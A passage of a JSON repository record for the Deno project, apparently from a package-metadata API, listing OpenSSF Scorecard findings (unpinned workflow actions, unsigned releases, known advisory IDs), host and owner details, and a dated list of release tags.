https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2